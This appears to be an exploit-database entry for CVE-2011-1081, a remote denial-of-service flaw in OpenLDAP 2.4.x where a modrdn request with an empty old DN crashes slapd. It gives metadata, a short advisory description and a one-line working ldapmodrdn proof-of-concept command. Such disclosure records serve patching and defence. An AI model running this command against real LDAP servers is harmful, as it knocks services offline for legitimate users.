OpenLDAP 2.4.x - 'modrdn' NULL OldDN Remote Denial of Service
Author: Serge Dubrouski
type: dos
platform: linux
port:
date_added: 2011-01-03
date_updated: 2014-12-03
verified: 1
codes: CVE-2011-1081;OSVDB-72530
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/46831/info
OpenLDAP is prone to a remote denial-of-service vulnerability that affects the 'modify relative distinguished name' (modrdn) command.
Attackers can exploit this issue to deny service to legitimate users by crashing affected 'slapd' servers.
ldapmodrdn -x -H ldap://ldapserver -r '' o=test